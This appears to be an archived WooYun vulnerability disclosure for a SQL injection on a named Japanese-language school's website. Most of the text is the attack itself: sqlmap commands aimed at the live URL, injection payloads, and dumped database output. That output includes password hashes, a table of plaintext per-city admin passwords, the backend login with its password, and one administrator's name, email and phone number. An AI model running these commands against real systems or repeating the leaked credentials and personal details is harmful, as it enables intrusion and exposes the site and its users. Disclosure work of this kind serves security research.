乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-23: 厂商已经主动忽略漏洞,细节向公众公开
樱花国际日语存在SQL注入漏洞(sa权限),可登陆后台,致使187万用户的姓名,手机号,归属地等信息泄露。樱花国际日语 绽放你的人生!
使用sqlmap神器进行测试:1. 初始测试
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId --dbs --current-user --users --is-dba --password --threads=10
2. 继续测试(竟然是明文储存)
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D neworld_sakura -T admin -C id,logname,pwd --dump
3. 爆出管理员密码(admin888)
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D SakuraCMS -T UserInfo -C Email,Mobile,RealName,UserAccount,UserId,UserPwd --dump
Parameter: cityId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: vid=38&cityId=0 AND 2957=2957 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: vid=38&cityId=0 AND 6349=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6349=6349) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)))---
web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005current user: 'jackchenyang'current user is DBA: Truedatabase management system users [5]:[*] jackchenyang[*] sa[*] SakuraCMS[*] sakuraweb[*] swxdatabase management system users password hashes:[*] jackchenyang [1]: password hash: 0x010064f6592203bbeddb5d1fc28c20eef1005365b022da05ff7a header: 0x0100 salt: 64f65922 mixedcase: 03bbeddb5d1fc28c20eef1005365b022da05ff7a[*] sa [1]: password hash: 0x01004086ceb6acb6cb34f9ad21709304eb07039aedfa8a57ff0a header: 0x0100 salt: 4086ceb6 mixedcase: acb6cb34f9ad21709304eb07039aedfa8a57ff0a[*] SakuraCMS [1]: password hash: 0x010042a0ef21f2a16e2f3d5fea957822df49ca86f56ea2d1ff12 header: 0x0100 salt: 42a0ef21 mixedcase: f2a16e2f3d5fea957822df49ca86f56ea2d1ff12[*] sakuraweb [1]: password hash: 0x010019d2c4a84e8b68049969c35ae38e557642a4f99736c7797e header: 0x0100 salt: 19d2c4a8 mixedcase: 4e8b68049969c35ae38e557642a4f99736c7797e[*] swx [1]: password hash: 0x01006df54d7734de89907c0cf0aa1b131fdbe16a1fc135853ff8 header: 0x0100 salt: 6df54d77 mixedcase: 34de89907c0cf0aa1b131fdbe16a1fc135853ff8available databases [9]:[*] liuxueDB[*] LX[*] master[*] model[*] msdb[*] neworld_sakura[*] SakuraCMS[*] tempdb[*] WeiXinCMS
Database: neworld_sakura[61 tables]+----------------------------+| Activities || AdManage || Dm_Mobile || Gift || Sakura_AD || Sakura_Gift || Sakura_Register || Sakura_Tips || Sakura_batch || Sakura_log || Smart_AdGroup || Smart_AdList || Smart_AdManage || Smart_AuthInfo || Smart_Channel || Smart_Channel_CustomFields || Smart_City || Smart_Content || Smart_Custom_Pages || Smart_Custom_Tags || Smart_Dict || Smart_Event || Smart_Extend_Blogroll || Smart_Log || Smart_Media || Smart_MenuInfo || Smart_RoleInfo || Smart_Special || Smart_Upload || Smart_User || UserInfo || UserInfos || UserMenu || UserPermission || UserRole || admin || aduser || db_Active || db_AdMange || db_Admin || db_City || db_DistinctMb || db_Log || db_Media || db_Media_log || db_Register || db_batch || dtproperties || s_area || s_city || s_info || s_job || s_mobile || s_news || s_template || s_templatetables || sysdiagrams || v_AdMange || v_RegisterList || v_index || v_votess_download |+----------------------------+Database: neworld_sakuraTable: admin[30 entries]+----+------------+---------------------+| id | logname | pwd |+----+------------+---------------------+| 1 | admin | sakurajp1234567*() || 10 | 深圳 | sakurajpsz_d8k || 11 | 苏州 | sz_sakurajp || 12 | 杭州 | hz_sakurajp || 13 | 无锡 | wx_sakurajp || 14 | 宁波 | nb_sakurajp || 15 | 东莞 | <blank> || 16 | test | test || 17 | 南京 | nj_sakurajp || 18 | 南通 | nt_sakurajp || 19 | 天津 | tj_sakurajp || 20 | 重庆 | 123456 || 21 | sakurajpCD | CDsakurajp || 22 | 厦门 | 1234567 || 23 | 合肥 | sakurajphf_1126 || 24 | 昆山 | sakurajpks_1126 || 25 | 江苏 | js_sakurajp || 26 | 武汉 | wh_sakurajp || 28 | 常州 | cz_sakurajp || 29 | 福州 | <blank> || 30 | 佛山 | fs_sakurajp || 31 | 广东 | gd_sakurajp || 32 | 福建 | fj_sakurajp || 35 | 济南 | jn_sakurajp123 || 36 | 常熟 | changshu || 5 | 北京 | sakurajpbj_843 || 6 | 上海 | sakurajpsh021 || 7 | 青岛 | sakurajpqd_klu123 || 8 | 大连 | dl112233 || 9 | 广州 | sakurajpgz_520 |+----+------------+---------------------+
Database: SakuraCMSTable: UserInfo[1 entry]+----------------------+-------------+----------+-------------+--------+----------------------------------+| Email | Mobile | RealName | UserAccount | UserId | UserPwd |+----------------------+-------------+----------+-------------+--------+----------------------------------+| [email protected] | 18221892552 | 陈阳 | admin | 1 | 7FEF6171469E80D32C0559F88B377245 |+----------------------+-------------+----------+-------------+--------+----------------------------------+
后台登陆地址:http://www.sakurajp.com.cn/admin
用户名:admin密码:admin888
一共有用户1875749名,其中姓名,归属地,手机号码等各种泄露。
增加过滤。
未能联系到厂商或者厂商积极拒绝